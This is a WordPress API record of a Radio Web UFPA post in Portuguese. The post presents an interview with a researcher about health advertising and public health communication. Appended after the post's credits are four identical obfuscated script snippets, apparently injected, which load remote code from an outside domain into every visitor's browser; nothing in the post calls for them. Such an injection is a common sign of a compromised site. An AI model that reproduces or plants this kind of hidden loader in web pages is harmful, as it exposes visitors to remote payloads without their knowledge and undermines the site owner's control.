{"id":13990,"date":"2023-09-15T15:54:52","date_gmt":"2023-09-15T18:54:52","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=13990"},"modified":"2025-10-21T12:55:34","modified_gmt":"2025-10-21T15:55:34","slug":"publicidade-e-saude","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/","title":{"rendered":"Publicidade e Sa\u00fade"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;Publicidade e Sa\u00fade&#8221;<\/p><p class=\"category\">UFPA Pesquisa<\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/UFPA-PESQUISA-PUBLICIDADE-E-SAUDE-14.09.23.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>Publicidade e Sa\u00fade \u00e9 o tema em destaque nesta edi\u00e7\u00e3o do\u00a0<a href=\"https:\/\/radio.ufpa.br\/index.php\/category\/ufpa-pesquisa\/\" target=\"_blank\" rel=\"noreferrer noopener\">UFPA Pesquisa<\/a>. No programa, a jornalista Elissandra Batista bate um papo com o professor doutor Sandro Torres, do Departamento de Express\u00e3o e Linguagens (DEL) da Escola de Comunica\u00e7\u00e3o (ECO)\u00a0da Universidade Federal do Rio de Janeiro (UFRJ)\u00a0e, tamb\u00e9m, do Programa de P\u00f3s-Gradua\u00e7\u00e3o em Informa\u00e7\u00e3o e Comunica\u00e7\u00e3o em Sa\u00fade (PPGICS) da Funda\u00e7\u00e3o Oswaldo Cruz (Fiocruz).<\/p>\n\n\n\n<p>No UFPA Pesquisa, Sandro Torres destaca o papel da comunica\u00e7\u00e3o publicit\u00e1ria para a promo\u00e7\u00e3o da sa\u00fade e do bem-estar coletivo, destacando a falta de efici\u00eancia das campanhas informativas de car\u00e1ter publicit\u00e1rio. &#8220;Atualmente n\u00f3s temos a transm\u00eddia permitindo que o mesmo conte\u00fado atravesse v\u00e1rios canais e plataformas. Assim, eu acho que um dos principais problemas hoje \u00e9 que continuamos fazendo publicidade de sa\u00fade apenas na televis\u00e3o, no r\u00e1dio, em outdoor, em banners para a internet, pensando que \u00e9 o suficiente&#8221;, explica Sandro Torres.<\/p>\n\n\n\n<p>Nesse sentido, vale ressaltar a l\u00f3gica utilizada pelas ag\u00eancias de publicidade que levam em considera\u00e7\u00e3o as profundas transforma\u00e7\u00f5es da cultura digital, com o objetivo claro de atrair o p\u00fablico-alvo, aumentar o consumo e, consequentemente, garantir sucesso financeiro e econ\u00f4mico para as marcas corporativas.<\/p>\n\n\n\n<p>Para o professor Sandro Torres, a ideia \u00e9 deixar para tr\u00e1s a velha l\u00f3gica da m\u00eddia de massa, que tem suas ra\u00edzes no s\u00e9culo XX, e adotar estrat\u00e9gias mais alinhadas com a era digital, integrando o cidad\u00e3o em um circuito publicit\u00e1rio que, de certa forma, lembra a forma como as marcas corporativas envolvem os consumidores. <\/p>\n\n\n\n<p>Dessa forma, assim como as marcas corporativas se adaptaram para engajar os consumidores em um mundo digital, as institui\u00e7\u00f5es p\u00fablicas podem adotar uma abordagem semelhante para promover n\u00e3o apenas os servi\u00e7os oferecidos pelos \u00f3rg\u00e3os governamentais, mas, principalmente, a sa\u00fade e o bem-estar da popula\u00e7\u00e3o.<\/p>\n\n\n\n<p>Diante desse cen\u00e1rio, o pesquisador pontua a atua\u00e7\u00e3o do Laborat\u00f3rio de Comunica\u00e7\u00e3o Publicit\u00e1ria Aplicada \u00e0 Sa\u00fade e \u00e0 Sociedade (Compasso-ECO\/UFRJ), que ele coordena. O Compasso visa selecionar, analisar e criticar a propaganda governamental direcionada para a promo\u00e7\u00e3o da sa\u00fade e do bem-estar coletivos, em especial \u00e0s popula\u00e7\u00f5es em situa\u00e7\u00e3o de vulnerabilidade.<\/p>\n\n\n\n<p>Al\u00e9m disso, a miss\u00e3o do Laborat\u00f3rio \u00e9 propor projetos de comunica\u00e7\u00e3o eficientes com foco em agentes comunit\u00e1rios, profissionais de sa\u00fade, educadores e lideran\u00e7as comunit\u00e1rias. Por exemplo, ao abordar o tema das Infec\u00e7\u00f5es Sexualmente Transmiss\u00edveis (ISTs), a pesquisa &nbsp;se estende \u00e0 psicologia, servi\u00e7o social, sa\u00fade coletiva, enfermagem, al\u00e9m de outras disciplinas, permitindo identificar o que a popula\u00e7\u00e3o realmente precisa saber e compreender sobre o tema da sa\u00fade.<\/p>\n\n\n\n<p>\u201cCom base nessa pesquisa abrangente, desenvolvemos uma campanha publicit\u00e1ria que visa n\u00e3o apenas corrigir os erros identificados nas campanhas anteriores, mas, tamb\u00e9m, incorporar as orienta\u00e7\u00f5es fornecidas por nossos parceiros multidisciplinares. O objetivo \u00e9 criar uma campanha eficaz que seja informada pela expertise de diversas \u00e1reas do conhecimento e que realmente atenda \u00e0s necessidades da popula\u00e7\u00e3o&#8221;, ressalta Sandro Torres. &nbsp;<\/p>\n\n\n\n<p>Para entender melhor os desafios e estrat\u00e9gias dos processos sobre Publicidade e Sa\u00fade no Brasil, n\u00e3o perca o UFPA Pesquisa. <\/p>\n\n\n\n<p>Apresenta\u00e7\u00e3o: Elissandra Batista<\/p>\n\n\n\n<p>Produ\u00e7\u00e3o: L\u00edvia Leoni<\/p>\n\n\n\n<p>Grava\u00e7\u00e3o e montagem: Jo\u00e3o Nilo <\/p>\n\n\n\n<p>Supervis\u00e3o e edi\u00e7\u00e3o: Elissandra Batista  <\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Publicidade e Sa\u00fade\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/\" aria-label=\"Read more about Publicidade e Sa\u00fade\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":14007,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[329],"tags":[],"class_list":["post-13990","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-pesquisa"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Publicidade e Sa\u00fade - Radio Web UFPA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Publicidade e Sa\u00fade - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"... Ler mais\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2023-09-15T18:54:52+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T15:55:34+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/publi-e-saude3-1.jpg?fit=569%2C421&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"569\" \/>\n\t<meta property=\"og:image:height\" content=\"421\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"Publicidade e Sa\u00fade\",\"datePublished\":\"2023-09-15T18:54:52+00:00\",\"dateModified\":\"2025-10-21T15:55:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/\"},\"wordCount\":595,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/publi-e-saude3-1.jpg?fit=569%2C421&ssl=1\",\"articleSection\":[\"UFPA Pesquisa\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/\",\"name\":\"Publicidade e Sa\u00fade - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/publi-e-saude3-1.jpg?fit=569%2C421&ssl=1\",\"datePublished\":\"2023-09-15T18:54:52+00:00\",\"dateModified\":\"2025-10-21T15:55:34+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/publi-e-saude3-1.jpg?fit=569%2C421&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/publi-e-saude3-1.jpg?fit=569%2C421&ssl=1\",\"width\":569,\"height\":421,\"caption\":\"Publicidade e Sa\u00fade\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Publicidade e Sa\u00fade\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Publicidade e Sa\u00fade - Radio Web UFPA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/","og_locale":"pt_BR","og_type":"article","og_title":"Publicidade e Sa\u00fade - Radio Web UFPA","og_description":"... Ler mais","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2023-09-15T18:54:52+00:00","article_modified_time":"2025-10-21T15:55:34+00:00","og_image":[{"width":569,"height":421,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/publi-e-saude3-1.jpg?fit=569%2C421&ssl=1","type":"image\/jpeg"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"Publicidade e Sa\u00fade","datePublished":"2023-09-15T18:54:52+00:00","dateModified":"2025-10-21T15:55:34+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/"},"wordCount":595,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/publi-e-saude3-1.jpg?fit=569%2C421&ssl=1","articleSection":["UFPA Pesquisa"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/","name":"Publicidade e Sa\u00fade - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/publi-e-saude3-1.jpg?fit=569%2C421&ssl=1","datePublished":"2023-09-15T18:54:52+00:00","dateModified":"2025-10-21T15:55:34+00:00","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/publi-e-saude3-1.jpg?fit=569%2C421&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/publi-e-saude3-1.jpg?fit=569%2C421&ssl=1","width":569,"height":421,"caption":"Publicidade e Sa\u00fade"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-pesquisa\/publicidade-e-saude\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Publicidade e Sa\u00fade"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/publi-e-saude3-1.jpg?fit=569%2C421&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-3DE","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/13990","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=13990"}],"version-history":[{"count":10,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/13990\/revisions"}],"predecessor-version":[{"id":17773,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/13990\/revisions\/17773"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/14007"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=13990"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=13990"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=13990"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}